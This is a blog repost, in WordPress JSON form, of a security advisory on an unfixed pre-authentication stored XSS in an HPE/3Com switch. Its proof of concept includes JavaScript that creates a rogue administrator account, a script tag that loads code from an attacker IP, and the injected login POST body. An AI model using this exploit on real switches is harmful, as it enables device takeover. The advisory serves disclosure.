{"id":9966,"date":"2017-10-18T14:19:20","date_gmt":"2017-10-18T22:19:20","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/10\/18\/news-3739\/"},"modified":"2017-10-18T14:19:20","modified_gmt":"2017-10-18T22:19:20","slug":"news-3739","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2017\/10\/18\/news-3739\/","title":{"rendered":"SSD Advisory \u2013 HPE Baseline Smart Gig SFP 24 Switch Pre-authentication Stored XSS"},"content":{"rendered":"<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Wed, 18 Oct 2017 05:42:41 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<p><strong>Want to get paid for a vulnerability similar to this one?<\/strong><br \/>Contact us at: <a href=\"mailto:sxsxd@bxexyxoxnxdxsxexcxuxrxixtxy.com\" onmouseover=\"this.href=this.href.replace(\/x\/g,'');\" id=\"a-href-3389\">sxsxdx@xbxexyxoxnxdxsxexcxuxrxixtxy.xcom<\/a><\/p>\n<p><script>var obj = jQuery('#a-href-3389');if(obj[0]) { obj[0].innerText = obj[0].innerText.replace(\/x\/g, ''); }<\/script>  \t\t<\/p>\n<div class=\"pf-content\">\n<p><strong>Vulnerability Summary<\/strong><br \/> The following advisory describes an unauthenticated stored XSS in the HPE Baseline Smart Gig SFP 24 \/ 3Com Baseline Switch 2924 SFP Plus Switch.<\/p>\n<p>The vulnerability affect versions:<\/p>\n<ul>\n<li><u>Software Version<\/u>: 01.00.10<\/li>\n<li><u>Boot version<\/u>: 1.0.0.14<\/li>\n<li><u>Hardware Version<\/u>: 01.01.0a<\/li>\n<\/ul>\n<p>&#8220;On April 12, 2010, Hewlett-Packard completed the acquisition of 3Com. Since the acquisition, 3Com has been fully absorbed by Hewlett-Packard and no longer exists as a separate entity.&#8221;<\/p>\n<p>Every 3Com model changed its identification number. The new HP name\/ID number for this switch is &#8220;HP Baseline Smart Gig SFP 24 &#8211; JE002A&#8221;<\/p>\n<p>There is no other difference between 3CBLSG24 and JE002A.<\/p>\n<p><strong>Credit<\/strong><br \/> An independent security researcher has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program<\/p>\n<p><strong>Vendor response<\/strong><br \/> HPE was informed of the vulnerability, their response was: &#8220;This issue is not going to be resolved. We had hoped resources could be found to address the issue, but the business determined that the product is out of support life. It\u2019s been this way for several years. We hoped we could communicate something to customers about the product, but this switch is truly not supported in that way either.&#8221;<\/p>\n<p><span id=\"more-3389\"><\/span><\/p>\n<p><strong>Vulnerability details<\/strong><br \/> In order to trigger the vulnerability all that an attacker needs to do is have an accesses to the management web interface.<\/p>\n<p>When a user tries to connect with wrong user and password, the bad login attempt will be saved in Administration -> Logging [Display] page.<\/p>\n<p>Because an unauthenticated user&#8217;s controlled input is not sufficiently sanitized in the case of a bad login attempt, the payload sent to the POST request (http:\/\/IP\/config\/log_off_page.htm) of the bad login attempt will be saved and executed by an authenticated user that will visit the log page.<\/p>\n<p><a href=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/08\/3.png\" data-slb-active=\"1\" data-slb-asset=\"1774492158\" data-slb-internal=\"0\" data-slb-group=\"3389\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/08\/3-300x105.png\" alt=\"\" width=\"300\" height=\"105\" class=\"alignnone size-medium wp-image-3390\" srcset=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/08\/3-300x105.png 300w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/08\/3-768x270.png 768w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/08\/3-1024x360.png 1024w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/08\/3.png 1064w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><strong>Proof of Concept<\/strong><br \/> Setup:<\/p>\n<ul>\n<li><u>Switch IP<\/u>: 192.168.0.253<\/li>\n<li><u>Attacker IP<\/u>: 192.168.0.186 (Kali)<\/li>\n<\/ul>\n<p>First step is to generate the JavaScript that we want to run on the victim&#8217;s machine.<\/p>\n<p>In order to do that, we wrote the following script that allows you to pass attacker&#8217;s controlled parameters to chosen URI:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-59e7d367ca0bc848162653\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> #Usage: [URI] [Parameters to URI]    function postwith (to,p) {    var myForm = document.createElement(&#8220;form&#8221;);    myForm.method=&#8221;post&#8221; ;    myForm.action = to ;    for (var k in p) {      var myInput = document.createElement(&#8220;input&#8221;) ;      myInput.setAttribute(&#8220;name&#8221;, k) ;      myInput.setAttribute(&#8220;value&#8221;, p[k]);      myForm.appendChild(myInput) ;    }    document.body.appendChild(myForm) ;    myForm.submit() ;    document.body.removeChild(myForm) ;  };<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">  \t\t\t\t  \t\t\t<\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0019 seconds] -->  <\/p>\n<p>The following function will create a valid request to add a new administrator user named &#8220;SSD_USER&#8221; with password &#8220;SSD_USER&#8221;:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-59e7d367ca0c5787007106\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> function postwith (to,p) {    var myForm = document.createElement(&#8220;form&#8221;);    myForm.method=&#8221;post&#8221; ;    myForm.action = to ;    for (var k in p) {      var myInput = document.createElement(&#8220;input&#8221;) ;      myInput.setAttribute(&#8220;name&#8221;, k) ;      myInput.setAttribute(&#8220;value&#8221;, p[k]);      myForm.appendChild(myInput) ;    }    document.body.appendChild(myForm) ;    myForm.submit() ;    document.body.removeChild(myForm) ;  };    postwith(&#8216;http:\/\/192.168.0.253\/Athentication\/password_a.htm&#8217;,{&#8216;LocalUserTable$endVT&#8217;:&#8217;OK&#8217;,&#8217;rlAAALocalUserName$add&#8217;:&#8217;SSD_USER&#8217;,&#8217;rlAAALocalHostStatus$add&#8217;:&#8217;4&#8242;,&#8217;rlAAALocalUserPassword$add&#8217;:&#8217;$SSD_USER&#8217;,&#8217;rlAAALocalUserPrivilage$add&#8217;:&#8217;15&#8217;,&#8217;LocalUserTable$endAdd&#8217;:&#8217;OK&#8217;});<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-59e7d367ca0c5787007106-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59e7d367ca0c5787007106-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59e7d367ca0c5787007106-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59e7d367ca0c5787007106-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59e7d367ca0c5787007106-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59e7d367ca0c5787007106-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59e7d367ca0c5787007106-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59e7d367ca0c5787007106-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59e7d367ca0c5787007106-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59e7d367ca0c5787007106-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59e7d367ca0c5787007106-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59e7d367ca0c5787007106-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59e7d367ca0c5787007106-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59e7d367ca0c5787007106-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59e7d367ca0c5787007106-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59e7d367ca0c5787007106-16\">16<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-59e7d367ca0c5787007106-1\"><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">postwith<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-st\">to<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">p<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59e7d367ca0c5787007106-2\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">myForm<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">document<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">createElement<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;form&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59e7d367ca0c5787007106-3\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">myForm<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">method<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;post&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59e7d367ca0c5787007106-4\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">myForm<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">action<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">to<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59e7d367ca0c5787007106-5\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-st\">for<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">k<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">p<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59e7d367ca0c5787007106-6\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">myInput<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">document<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">createElement<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;input&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59e7d367ca0c5787007106-7\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">myInput<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">setAttribute<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;name&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">k<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59e7d367ca0c5787007106-8\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">myInput<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">setAttribute<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;value&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">p<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">k<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59e7d367ca0c5787007106-9\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">myForm<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">appendChild<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">myInput<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59e7d367ca0c5787007106-10\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59e7d367ca0c5787007106-11\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">document<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">body<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">appendChild<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">myForm<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59e7d367ca0c5787007106-12\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">myForm<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">submit<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59e7d367ca0c5787007106-13\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">document<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">body<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">removeChild<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">myForm<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59e7d367ca0c5787007106-14\"><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59e7d367ca0c5787007106-15\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59e7d367ca0c5787007106-16\"><span class=\"crayon-e\">postwith<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;http:\/\/192.168.0.253\/Athentication\/password_a.htm&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-s\">&#8216;LocalUserTable$endVT&#8217;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-s\">&#8216;OK&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8216;rlAAALocalUserName$add&#8217;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-s\">&#8216;SSD_USER&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8216;rlAAALocalHostStatus$add&#8217;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-s\">&#8216;4&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8216;rlAAALocalUserPassword$add&#8217;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-s\">&#8216;$SSD_USER&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8216;rlAAALocalUserPrivilage$add&#8217;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-s\">&#8217;15&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8216;LocalUserTable$endAdd&#8217;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-s\">&#8216;OK&#8217;<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0022 seconds] -->  <\/p>\n<p>We will save the output file on the attacker&#8217;s machine.<\/p>\n<p>The second step is to write the payload that we want to send via POST request to the vulnerable machine. <\/p>\n<p>The following script will load the file from step one and execute him:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-59e7d367ca0c9778889970\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-mixed-highlight\" title=\"Contains Mixed Languages\"><\/span><\/p>\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> &lt;script&gt;document.write(&#8220;&lt;script src=http:\/\/192.168.0.186\/script.js&gt;&lt;\/script&gt;&#8221;);&lt;\/script&gt;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-59e7d367ca0c9778889970-1\">1<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-59e7d367ca0c9778889970-1\"><span class=\"crayon-ta\">&lt;script&gt;<\/span><span class=\"crayon-v\">document<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">write<\/span><span class=\"crayon-sy\">(<\/span>&#8220;<span class=\"crayon-ta\">&lt;script <\/span><span class=\"crayon-v\">src<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">http<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-c\">\/\/192.168.0.186\/script.js&gt;&lt;\/script&gt;<\/span>&#8220;<span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">script<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0013 seconds] -->  <\/p>\n<p>Third step &#8211; We will encode: &lt;em>&lt;script src=http:\/\/192.168.0.186\/script.js>&lt;\/script>&lt;\/em> with base64 and send the following POST request:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-59e7d367ca0cc957139675\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> estoreUrl=&amp;errorCollector=&amp;rlEmWebMaxIdleTimeout=600&amp;rlIfNumOfPhPorts=24&amp;ModuleTable=OK&amp;rlPhdModuleTable%24VT=OK&amp;rlPhdModuleStackUnit%24VT=Type%3D0%3BAccess%3D1%3BNumOfEnumerations%3D0%3BRange0%3D%5B-2147483648%2C2147483647%5D&amp;rlPhdModuleIndex%24VT=Type%3D0%3BAccess%3D1%3BNumOfEnumerations%3D0%3BRange0%3D%5B-2147483648%2C2147483647%5D&amp;rlPhdModuleType%24VT=Type%3D0%3BAccess%3D1%3BNumOfEnumerations%3D0%3BRange0%3D%5B-2147483648%2C2147483647%5D&amp;ModuleTable%24endVT=OK&amp;userName%24query=&#8221;&lt;===== PAYLOAD ======&gt;&#8221;&amp;password%24query=asd<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-59e7d367ca0cc957139675-1\">1<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-59e7d367ca0cc957139675-1\"><span class=\"crayon-v\">estoreUrl<\/span><span class=\"crayon-o\">=&amp;<\/span><span class=\"crayon-v\">errorCollector<\/span><span class=\"crayon-o\">=&amp;<\/span><span class=\"crayon-v\">rlEmWebMaxIdleTimeout<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">600<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">rlIfNumOfPhPorts<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">24<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">ModuleTable<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">OK<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">rlPhdModuleTable<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">24VT<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">OK<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">rlPhdModuleStackUnit<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">24VT<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">Type<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">3D0<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">3BAccess<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">3D1<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">3BNumOfEnumerations<\/span><span class=\"crayon-o\">%<\/span><span 